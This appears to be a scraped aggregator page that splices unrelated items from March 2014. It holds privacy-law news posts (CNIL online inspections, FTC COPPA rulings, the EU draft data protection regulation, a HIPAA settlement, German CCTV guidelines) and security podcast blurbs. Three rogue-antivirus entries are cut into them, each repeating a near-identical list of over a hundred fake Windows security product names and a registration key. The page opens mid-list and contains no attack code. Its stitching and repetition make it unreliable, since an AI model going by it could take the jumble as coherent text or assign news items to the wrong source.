Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

New French Law Authorizes the CNIL to Conduct Online Inspections

On March 18, 2014, a new French consumer law (Law No. 2014-344) was published in the Journal Officiel de la République Franҫaise. The new law strengthens the investigative powers of the French Data Protection Authority (the “CNIL”) by giving the CNIL the ability to conduct online inspections.

Currently, the CNIL may conduct three types of investigations:

  • On-site inspections – the CNIL may visit a company’s facilities and access anything that stores personal data (e.g., servers, computers, applications). On-site inspections currently represent the vast majority of the inspections conducted by the CNIL.
  • Document reviews – these inspections allow the CNIL to require an entity to disclose documents or files (upon written request).
  • Hearings – the CNIL may summon representatives of organizations to appear for questioning and to provide other necessary information.

Further to its new online inspection authority, now the CNIL also may identify violations of the French Data Protection Act through remote investigations. For example, this new investigative power will enable the CNIL to check whether online privacy notices comply with French data protection law, and to verify whether entities obtain users’ prior consent before sending electronic marketing communications.

The CNIL emphasized that the new online investigations will concern only publicly available data, and that the law does not give the CNIL the right to circumvent security measures to gain access to information systems.

In 2013, the CNIL conducted 414 inspections. In light of this new online investigation tool, even more inspections are likely in 2014.

Inventor of the World Wide Web Calls for an Online Constitution

On the 25th anniversary of his first proposal for what would become the World Wide Web (the “Web”), Sir Timothy John “Tim” Berners-Lee expressed concern at what he sees as the increasing threat that governments and commercial interests pose to the openness and accessibility of the Web. In a wide-ranging interview with the UK’s The Guardian newspaper, Berners-Lee criticized the approach that some lawmakers have taken on issues such as net neutrality and copyright legislation, as well as the decision by some countries to limit access to the wider Internet. He also called for an end to the control that the U.S. Department of Commerce exerts over the Internet Domain Name System.

To address these concerns, Berners-Lee has proposed the creation of a “global constitution,” a digital equivalent of the Universal Declaration of Human Rights, to guarantee the free flow of information and to foster collaboration and creativity over the open Web. This proposal is being presented by the Web We Want campaign, which is overseen by the World Wide Web Foundation. The campaign will provide small grants to organizations that promote the principles of open access to the Web, and aim to raise public awareness of these issues. Whether the campaign will lead to tangible change remains to be seen, but it is clear that the debate over the question of online rights is far from over.

FTC Acts on Several Industry COPPA Proposals

The Federal Trade Commission recently acted on three industry proposals in accordance with the new Children’s Online Privacy Protection Rule (the “COPPA Rule”) that came into effect July 1, 2013. Specifically, the FTC determined that it was unnecessary to rule on a proposed parental consent mechanism, approved a proposed “safe harbor” program and is seeking public comment on a separate proposed “safe harbor” program.

The COPPA Rule requires operators of certain websites and online services to obtain a parent’s consent before collecting personal information online from a child under the age of 13. In addition to the acceptable methods for obtaining the required parental consent listed in the COPPA Rule, the FTC’s revisions also allow entities to propose their own parental consent mechanisms for approval by the Commission. On February 25, 2014, the FTC determined that it was unnecessary to rule on a proposed parental consent mechanism submitted by iVeriFly, Inc. (“iVeriFly”) because iVeriFly’s proposal was merely a variation on existing parental consent mechanisms already recognized by the COPPA Rule or approved by the FTC.

In addition, the COPPA Rule permits industry to propose self-regulatory guidelines that implement the COPPA Rule’s protections. If the FTC approves a set of self-regulatory guidelines, companies that comply with those guidelines are protected (i.e., receive “safe harbor”) from FTC enforcement under the COPPA Rule. On February 12, 2014, the FTC announced that it approved a safe harbor program submitted by the kidSAFE Seal Program (“kidSAFE”). In the announcement, the FTC stated that kidSAFE’s self-regulatory guidelines provided the “same or greater protections” for children under the age of 13 as those contained in the COPPA Rule.

On March 14, 2014, the FTC announced that it was seeking public comment on a separate proposed safe harbor program submitted by the Internet Keep Safe Coalition (“iKeepSafe”). The public comment period is open until April 21, 2014.

View the FTC’s letter to iVeriFly.

View the FTC’s letter to kidSAFE.

View the FTC’s notice in the Federal Register seeking comment on iKeepSafe’s proposal.

European Parliament Adopts Network and Information Security Directive

On March 13, 2014, the European Parliament voted to adopt the draft directive on measures to ensure a uniform level of network and information security (“NIS Directive”). The NIS Directive was proposed by the European Commission on February 7, 2013 as part of its cybersecurity strategy for the European Union. The NIS Directive aims to ensure a uniform level of cybersecurity across the EU. The European Parliament will next negotiate with the Council of the European Union to reach an agreement on the final text of the NIS Directive.

View the European Commission’s press release.

European Parliament Adopts Draft General Data Protection Regulation; Calls for Suspension of Safe Harbor

On March 12, 2014, the European Parliament formally adopted the compromise text of the proposed EU General Data Protection Regulation (the “Regulation”). The text now adopted by the Parliament is unchanged and had already been approved by the Parliament’s Committee on Civil Liberties, Justice and Home Affairs in October of last year. The Parliament voted with 621 votes in favor, 10 against and 22 abstentions for the Regulation.

In addition to adopting the compromise text of the Regulation, the Parliament adopted the compromise text of the Police and Criminal Justice Directive (the “Directive”).

The next steps for both the Regulation and the Directive are for the EU Council of Ministers to formulate a position and for trilateral negotiations between the European Commission, Parliament and Council to begin.

Safe Harbor Suspension

The Parliament also passed a resolution setting forth its findings and recommendations regarding the National Security Agency (“NSA”) surveillance program. Among other things, the resolution calls for:

  • withholding the Parliament’s consent to the Transatlantic Trade and Investment Partnership if European data protection principles are not fully respected;
  • suspending the Terrorist Finance Tracking Program until alleged breaches of the underlying data disclosure agreements have been fully clarified; and
  • suspending the Safe Harbor Framework immediately, alleging it does not adequately protect European citizens.

The Parliament’s resolution does not have immediate consequences for the validity of the Safe Harbor Framework. The underlying agreements relating to the Safe Harbor Framework were entered into by the European Commission, and in Europe, the Commission alone is in a position to formally renegotiate the agreements.

HHS Settles Potential HIPAA Violations with County Government

On March 7, 2014, the Department of Health and Human Services (“HHS”) announced a resolution agreement and $215,000 settlement with Skagit County, Washington, following a security breach that affected approximately 1,600 individuals.

The HHS Office for Civil Rights (“OCR”) investigated Skagit County after learning that unauthorized individuals had accessed receipts containing the protected health information (“PHI”) of patients of Skagit County’s Public Health Department. The receipts had been mistakenly stored on a publicly accessible server. During the investigation, OCR discovered that more PHI had been exposed in the incident, including information regarding the testing and treatment of infectious diseases. In the resolution agreement, OCR alleged that Skagit County had violated (1) the Privacy Rule by improperly disclosing PHI, (2) the Breach Notification Rule by not notifying all affected individuals, and (3) the Security Rule by failing to implement policies and procedures to prevent security violations and ensure compliance with the Security Rule and by not training its workforce.

Pursuant to the resolution agreement, Skagit County has agreed to pay a $215,000 settlement to HHS. In addition, the Corrective Action Plan attached to the resolution agreement requires Skagit County to:

  • provide substitute breach notification in print or broadcast media to all of the individuals affected by the incident;
  • submit its accounting of disclosures procedure, hybrid entity documentation and sample business associate agreement to HHS for review;
  • conduct a risk analysis as required by the Security Rule;
  • create or revise its HIPAA policies and procedures; and
  • provide HIPAA training to its workforce.

In announcing the resolution agreement, Susan McAndrew, Deputy Director of Health Information Privacy at OCR, stated that the case “sends a strong message” to local and county governments that they must “adopt a meaningful compliance program to ensure the privacy and security of patients’ information.”

View the resolution agreement.

German DPAs Issue Guidelines on CCTV Use

On March 10, 2014, the German Federal Commissioner for Data Protection and Freedom of Information and all 16 German state data protection authorities responsible for the private sector issued guidelines on the use of closed-circuit television (“CCTV”) by private companies. The guidelines provide information regarding the conditions under which CCTV may be used and outline the requirements for legal compliance. The guidelines feature:

  • general explanations of the legal framework, including the definitions of CCTV and public space, the legal requirements for assessments, required security measures, notice obligations and retention periods for images;
  • examples of how CCTV may be used by private companies in the public space (e.g., retail stores, restaurants), and discuss employee monitoring and other CCTV monitoring in non-public spaces; and
  • a list of questions that may be used as a checklist for data controllers and corporate data protection officers.

View a PDF of the Guidelines.

Windows Security Master

Windows Security Master is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Former FTC Counsel Markus Heyder Joins Centre for Information Policy Leadership at Hunton

The Centre for Information Policy Leadership at Hunton & Williams LLP (the “Centre”) announces Markus B. Heyder, International Consumer Protection Counsel at the U.S. Federal Trade Commission, will be joining as Vice President and Senior Policy Counselor, effective March 17, 2014. In this role, Heyder will work on policy development, research and publishing activities at the Centre, and will develop and maintain relationships with policy and regulatory authorities in North America, Asia and Latin America, among other tasks. He will be resident in the firm’s Washington, D.C. office.

“Markus has a distinguished reputation as a privacy lawyer and brings an impressive background in global data privacy, information security and consumer protection law and policy, including with the FTC, the primary U.S. privacy authority. His 20 years of experience will be an asset to Centre member companies as we work together with regulators to explore more effective solutions to the privacy challenges we face in the information age,” said Bojana Bellamy, president of the Centre. “We are privileged to have Markus on board. His leadership will enhance the effectiveness and visibility of the Centre in the United States, Latin America and Asia-Pacific.”

“I am excited about both the challenges and opportunities this role brings and look forward to working with Centre members on our common mission,” said Heyder, who served in the FTC’s Office of International Affairs in Washington, D.C. for over 10 years. At the FTC, he specialized in the areas of privacy, information security, consumer protection, international policy development, cross-border enforcement, and cooperation and information sharing. Immediately prior to his government work, Heyder was associated with Lovells (now Hogan Lovells) in Chicago, where he focused on privacy law, consumer financial services law, financial privacy law and e-commerce.

Windows Defence Unit

Windows Defence Unit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Perl Compatible Regular Expressions – Episode 364, Part 2 – March, 6, 2014

In this tech segment we're going to talk about regular expressions in python. We're going to be using perl-style regular expressions, which is usually referenced as "PCRE". PCRE is used in many places outside of Python, such as snort and other IDS signatures, and most places you see regular expressions, it will be PCRE. Regex is a language, but it's far more restricted than a normal programming language.

If you need to perform any complex string search and replace, you're probably going to use regular expressions. As the famous saying goes, Some people, when confronted with a problem, think “I know, I'll use regular expressions.” Now they have two problems.

So I'm going to teach you how to create some problems for yourself.

I'm going to put the testing strings in the show notes. If you want to play along, you don't need to install python, we're going to use pythex, an online regular expressions tester. I think this is the best way to demonstrate regular expressions without getting too bogged down in the context of code.

Interview with Eve Adams – Episode 364, Part 1 – March, 6, 2014

Eve Adams (@HackerHuntress) is Senior Talent Acquisition Expert at Halock Security Labs, a full-service information security advisory in Schaumburg, IL. Eve leverages her security staffing experience to drive recruitment for both internal Halock roles and client placement. She also spearheads Halock’s social media presence and counts Twitter as one of her most powerful recruiting tools. Eve’s passionate about information security, thinks most recruiters are doing it wrong, and naively believes technology can change the world for the better. In past lives, she has been a writer, translator and reptile specialist, among other things. While she is officially OS-agnostic, Eve usually runs Ubuntu at home.

U.S. FTC and UK ICO Sign Memorandum of Understanding

On March 6, 2014, the U.S. Federal Trade Commission (“FTC”) and UK Information Commissioner’s Office (“ICO”) signed a memorandum of understanding (“MOU”) to promote increased cooperation and information sharing between the two enforcement agencies.

The purpose of the MOU is to facilitate mutual assistance and the exchange of information in investigating and enforcing privacy violations. The MOU follows a number of international efforts to increase cross-border cooperation in privacy enforcement, including the OECD Recommendation on Cross-border Co-operation in the Enforcement of Laws Protecting Privacy, the GPEN Action Plan, the International Conference of Data Protection and Privacy Commissioners Resolution on International Enforcement Coordination, and the APEC Cooperation Arrangement for Cross-border Privacy Enforcement. In the increasingly interconnected and globalized world of today’s information age, regulators are recognizing the need to join forces to effectively investigate alleged privacy breaches and bring multilateral enforcement actions against companies operating in multiple jurisdictions.

In order to further common interests of cooperation, research and education, knowledge-sharing, and better understanding, the MOU sets out the FTC’s and ICO’s intentions, including to:

  • share information (including complaints);
  • provide investigative assistance in appropriate cases, such as obtaining evidence in the local jurisdiction on behalf of the other agency;
  • consider joint training programs and staff exchange; and
  • coordinate enforcement actions for privacy violations constituting breaches in both jurisdictions.

On its website, the ICO stated that the MOU will allow for closer cooperation between both organizations. The two agencies cooperated previously on a number of joint initiatives, including enforcing do-not-call and telemarketing laws. The ICO also has entered into a number of other memoranda of understanding with other authorities.

Article 29 Working Party Issues Opinion on BCR and APEC CBPR Requirements

On March 6, 2014 the Article 29 Working Party (the “Working Party”) published a comprehensive Opinion: Opinion 02/2014 on a referential for requirements for Binding Corporate Rules submitted to national Data Protection Authorities in the EU and Cross-Border Privacy Rules submitted to APEC CBPR Accountability Agents. This blog post provides an overview of the Opinion.

Background

Experts from EU data protection authorities (“DPAs”), along with their counterparts from the Asia-Pacific Economic Cooperation (“APEC”) Data Privacy Sub-Group developed a practical tool (the “Referential”) to reflect the respective requirements of the Binding Corporate Rules (“BCR”) and the Cross-Border Privacy Rules (“CBPR”) systems. The Referential lists the main elements generally required for submission of BCR to EU DPAs on the one hand, and those required to submit CBPRs to APEC CBPR recognized Accountability Agents on the other hand. The Referential was endorsed by APEC Senior Officials at their meeting on February 27-28, 2014, and the Working Party adopted its Opinion during its plenary meeting that took place on February 26-27, 2014.

Practical Checklist and Double Certification

The aim of the Referential is to provide an informal, practical checklist and comparative tool for organizations applying for BCR authorization and/or CBPR certification. It was developed to facilitate the design and adoption of data protection policies that comply with both systems. Although the Referential does not establish mutual recognition of both systems, according to the Working Party, it is intended to facilitate double certification. The Working Party also emphasizes that data protection policies of applicant companies operating in both regions must be approved separately by the relevant institutions in accordance with the applicable approval procedures for each system.

Common Requirements and Additional Elements

For each of the essential principles and requirements of the BCR and CBPR systems, the Referential lists the common elements as well as the additional elements that are specific to each system. The Working Party explicitly states that these additional elements must be taken into account by organizations applying for BCR or CBPR approval, but that the Referential does not affect individual authorization of BCR by EU DPAs or the certification of CBPR by APEC Accountability Agents. Further, the Referential does not affect enforcement by the relevant supervisory and/or enforcement authorities.

No Full Compatibility

The Working Party notes that significant differences exist between the requirements generally imposed by EU DPAs for BCR approval (in particular those deriving from EU data protection laws) and the CBPR program requirements. There also are differences between the respective objectives, scopes and review processes of the BCR and CBPR systems. Accordingly, certain BCR and CBPR requirements are not fully compatible.

Recommendations and Guidelines for Applicant Organizations

The Working Party recommends that applicant organizations provide clarity regarding their scope of data protection and privacy rules in order to avoid conflict with applicable laws. According to the Working Party, organizations must clearly specify in their applications the circumstances under which they intend to apply EU data protection laws and/or APEC CBPR program requirements.

The Working Party also notes that an organization’s data protection and privacy rules should be tailor-made to reflect the structure of the corporate group to which they apply, the data processing undertaken by the corporate group, and the policies and procedures that they have in place to protect personal data – EU DPAs and APEC Accountability Agents will not accept a straight “copy and paste” of the Referential.

In terms of scope of the two systems, the Working Party clarifies that CBPR certification is limited to organizations certified within a CBPR-participating Economy, and the scope of a particular organization’s CBPR certification will be limited to the entities, subsidiaries and affiliates identified in its application for CBPR certification. Similarly, the scope of a particular organization’s BCR will be limited to those entities, subsidiaries and affiliates identified in its application for BCR approval. An organization that wishes to transfer personal data from EU Member States to recipients located in non-EU countries may submit an application to the relevant national DPA in the EU for approval of its BCR.

If properly approved, the data protection and privacy rules applicable to cross border transfers of personal data can serve as the corporate group’s policy for all personal data processed by the corporate group as defined pursuant to its BCR and CBPR. Nevertheless, the Working Party emphasizes that EU data protection law requirements also apply where personal data is processed in the EU and, where personal data is processed in an APEC Economy, the laws of the relevant jurisdiction will apply.

OCR Releases HIPAA Privacy Rule Guidance on Mental Health Disclosures

The Department of Health and Human Services’ Office for Civil Rights (“OCR”) recently released guidance about the use and disclosure of mental health information. The guidance, entitled “HIPAA Privacy Rule and Sharing Information Related to Mental Health,” contains thirteen questions and answers that address the following topics:

  • Communicating mental health information to a patient’s family or friends;
  • Restricting the use and disclosure of psychotherapy notes;
  • Determining when a patient’s mental illness makes him or her incapacitated under the Privacy Rule;
  • Discussing the mental health conditions of minors with their parents;
  • Contacting law enforcement if a doctor is concerned about the patient’s safety or that the patient might harm someone else;
  • Disclosing to law enforcement when a patient is released after a temporary psychiatric hold; and
  • Sharing of a student’s mental health information by a school administrator, doctor or nurse and how such information is subject to the Family Educational Rights and Privacy Act.

In releasing the guidance, OCR noted that ensuring strong privacy protections is “critical to maintaining individuals’ trust in their health care providers and willingness to obtain needed health care services, and these protections are especially important” with respect to mental health information.

French Data Protection Authority Issues New Guidelines on E-Commerce and Direct Marketing

On March 5, 2014, the French Data Protection Authority (the “CNIL”) issued new guidelines in the form of five practical information sheets that address online purchases, direct marketing, contests and sweepstakes, and consumer tracking (the “Guidelines”).

Online Purchases

In the context of online purchases, the Guidelines make clear that online merchants must limit their use of bank card numbers and visual cryptograms. Once the transaction is complete, the merchants should not store or reuse the bank details of their customers without the customers’ prior consent. Although visual cryptograms should not be retained at all, the merchant may archive bank card numbers for up to 15 months (i.e., the time period during which a cardholder may challenge a charge).

Direct Marketing by Mail and Telephone

The Guidelines also focus on direct marketing by mail and telephone, reiterating that companies must (1) inform individuals of any possible commercial use of their personal data (either by the company itself or by business partners), and (2) enable individuals to object to such use when their data are collected.

Direct Marketing by Email, SMS and MMS 

Turning to electronic direct marketing, the Guidelines note that, with a few exceptions, companies must obtain the individual’s prior consent (“opt-in”) to send marketing communications by email, SMS and MMS.

Contests, Sweepstakes and Refer-a-Friend Programs 

With respect to contests and sweepstakes, the Guidelines emphasize that web users must be able to participate in online contests without being obligated to receive commercial communications. The Guidelines further clarify that the players’ electronic contact details may not be used for marketing purposes, except with the individual’s explicit consent.

Consumer Tracking 

Finally, the Guidelines address the issue of consumer tracking and the fact that the individual’s prior consent must be obtained when using geolocation information for commercial purposes, and when placing or accessing cookies or any other similar technologies on the user’s device. In certain cases, some cookies may, however, be placed without the users’ prior consent. For example, if the cookies are used for security purposes with respect to a service requested by the user (such as online access to the user’s bank account information).

The CNIL issued these Guidelines to increase merchant and consumer awareness and to help all parties understand their respective rights and obligations under French data protection law. In 2012, 20% of the complaints the CNIL received were related to commercial practices, in particular, direct marketing. When conducting inspections, the CNIL found that the majority of French data protection law violations pertained to unfair or illicit collection of personal data, failing to provide (or providing inaccurate) information to individuals, and not honoring the right to object to personal data processing.

2014 IAPP Global Privacy Summit

Join us at the International Association of Privacy Professionals (“IAPP”) Global Privacy Summit in Washington, D.C., March 5-7, 2014. Hunton & Williams privacy professionals will be featured speakers in the following sessions:

  • Protecting Privacy under the Cybersecurity Microscope
    Thursday, March 6, 10:45 a.m.
    Speakers include: Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice, Hunton & Williams LLP; Victoria King, Global Privacy Officer, United Parcel Service, Inc.; and Karen Neuman, Chief Privacy Officer, U.S. Department of Homeland Security.
  • Thinking Ahead vs. Keeping Up: The Challenge to Think Strategically
    Thursday, March 6, 10:45 a.m.
    Fred H. Cate, Senior Policy Advisor of the Centre for Information Policy Leadership at Hunton & Williams LLP and Distinguished Professor of Indiana University, will moderate the session. Speakers include: Sharon Anolik, President, Privacy Panacea; Stanley Crosley, Director, Indiana University CLEAR Health Information, Crosley Law Offices LLC; and Peter Lefkowitz, Chief Privacy Officer, General Electric Company.
  • The Risks of Processing Personal Information
    Thursday, March 6, 1:00 p.m.
    Bojana Bellamy, President of the Centre for Information Policy Leadership at Hunton & Williams LLP, will moderate the session. Speakers include: Peter Cullen, General Manager Trustworthy Computing, Microsoft Corporation; Isabelle Falque-Pierrotin, President, French Data Protection Authority (CNIL); Florence Raynal, Head of the Department of European and International Affairs, French Data Protection Authority (CNIL); and Richard Thomas, Global Strategy Advisor of the Centre for Information Policy Leadership at Hunton & Williams LLP.
  • The Digital Marketing Ecosystem: Trends, Risks and Obligations
    Thursday, March 6, 2:30 p.m.
    Speakers include: Bridget Treacy, partner, Hunton & Williams LLP; and Teena H. Lee, Vice President, Privacy and E-commerce Counsel, The Estée Lauder Companies Inc.

In addition to these panels, stop by Booth 2 in the Exhibit Hall to learn more about Hunton & Williams’ Global Privacy and Cybersecurity practice and its Centre for Information Policy Leadership. Visit the IAPP’s website for more information and the full conference schedule.

Windows Protection Booster

Windows Protection Booster is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




